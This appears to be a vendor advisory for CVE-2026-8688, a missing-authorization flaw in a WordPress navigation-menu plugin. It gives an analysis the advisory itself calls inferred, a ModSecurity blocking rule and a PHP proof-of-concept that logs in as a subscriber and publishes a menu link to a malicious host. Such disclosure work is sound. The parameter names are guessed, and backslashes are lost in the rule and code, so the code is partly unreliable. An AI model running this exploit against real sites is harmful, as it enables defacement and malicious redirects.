Atomic Edge analysis of CVE-2026-8688 (metadata-based): The Advance Nav Menu Manager plugin for WordPress versions up to 1.3 fails to verify user authorization before allowing authenticated users with subscriber-level access or higher to modify navigation menu items via the anmm_save_menu_data AJAX action. This vulnerability has a CVSS score of 4.3 (Medium) and affects the plugin’s functionality for duplicating, copying, moving, or publishing nav_menu_item posts.
Root Cause: The CWE-862 classification indicates a missing authorization check. Atomic Edge analysis infers that the AJAX handler for anmm_save_menu_data lacks a capabilities check or nonce verification before calling wp_insert_post(). WordPress plugins commonly register AJAX handlers using add_action(‘wp_ajax_{action}’, …) but often forget to include current_user_can() or check_admin_referer() calls. The plugin likely passes unsanitized or unfiltered parameters from the AJAX request directly to wp_insert_post(), allowing manipulation of menu items without verifying the user’s role or intent. These conclusions are inferred from the CWE classification and vulnerability description; no source code was available for confirmation.
Exploitation: An authenticated attacker with a subscriber account sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to “anmm_save_menu_data”. The request must include parameters that the plugin uses to construct the menu item data for wp_insert_post(). Typical parameters include menu_item_id, menu_id, menu_item_title, menu_item_url, and menu_item_status. The attacker can change the menu_item_status to “publish” to make a draft menu item visible, or set menu_id to attach menu items to a different menu. The AJAX handler processes these requests without verifying the current user has the edit_theme_options capability required for menu management, allowing any subscriber to modify navigation menus.
Remediation: The plugin must implement proper capability checking before processing menu modifications. The fix should add a check using current_user_can(‘edit_theme_options’) or a similar capability that restricts menu management to administrators and editors. Additionally, the plugin should verify a nonce using check_ajax_referer() or check_admin_referer() to prevent cross-site request forgery. The AJAX handler should also sanitize and validate all parameters passed to wp_insert_post() to prevent post type manipulation.
Impact: Successful exploitation allows authenticated users with minimal privileges to modify site navigation menus. Attackers can publish hidden menu items, move menu items to visible locations, duplicate malicious items, or reorganize menu structure. This can lead to defacement of the site’s navigation, insertion of links to malicious external sites, or manipulation of user flow. The attack does not provide direct data access or privilege escalation, but it compromises the integrity of the WordPress site’s navigation.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-8688 (metadata-based)
# Blocks unauthenticated or low-privilege exploitation of anmm_save_menu_data AJAX action
# This virtual patch blocks any POST request to admin-ajax.php with action=anmm_save_menu_data
# since legitimate use requires admin-level capabilities (edit_theme_options)
# and the vulnerability allows any authenticated user (subscriber+) to trigger it.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20268688,phase:2,deny,status:403,chain,msg:'CVE-2026-8688: Missing Authorization in Advance Nav Menu Manager - anmm_save_menu_data AJAX action blocked',severity:'CRITICAL',tag:'CVE-2026-8688',tag:'wordpress',tag:'plugin:advance-nav-menu-manager'"
SecRule ARGS_POST:action "@streq anmm_save_menu_data" "t:none,chain"
SecRule ARGS_POST:menu_item_id "@rx ^d+$" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8688 - Advance Nav Menu Manager <= 1.3 - Missing Authorization to Authenticated (Subscriber+) Nav Menu Item Modification via anmm_save_menu_data AJAX Action
// Configuration: Set target URL and credentials
$target_url = 'https://example.com'; // Change this to the WordPress site URL
$username = 'subscriber_user'; // Replace with subscriber credentials
$password = 'subscriber_password'; // Replace with subscriber password
// Step 1: Authenticate and get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve_2026_8688.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code !== 200) {
die("[-] Authentication failed. HTTP code: $http_coden");
}
echo "[+] Authentication successful.n";
curl_close($ch);
// Step 2: Exploit the missing authorization vulnerability
// The AJAX action is 'anmm_save_menu_data' based on the CVE description
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Payload 1: Publish a draft nav menu item
// We need to know a draft menu item ID. This PoC assumes menu_item_id=123 exists as draft.
// In a real attack, the attacker would first discover menu item IDs via other means.
$exploit_data = array(
'action' => 'anmm_save_menu_data',
'menu_item_id' => 123, // Example draft menu item ID
'menu_id' => 2, // Target menu to attach to
'menu_item_title' => 'Malicious Link',
'menu_item_url' => 'http://malicious.example.com',
'menu_item_status' => 'publish', // Change from draft to publish
'menu_item_type' => 'custom',
'menu_item_classes' => ''
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_2026_8688.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Exploit request sent to: $ajax_urln";
echo "[+] Payload: " . json_encode($exploit_data) . "n";
echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response Body: $responsen";
if ($http_code === 200 && strpos($response, 'success') !== false) {
echo "[+] Vulnerability exploited successfully! The menu item should now be published.n";
} else {
echo "[-] Exploit may have failed. Check the response.n";
}
// Clean up cookie file
unlink('/tmp/cookies_cve_2026_8688.txt');
?>
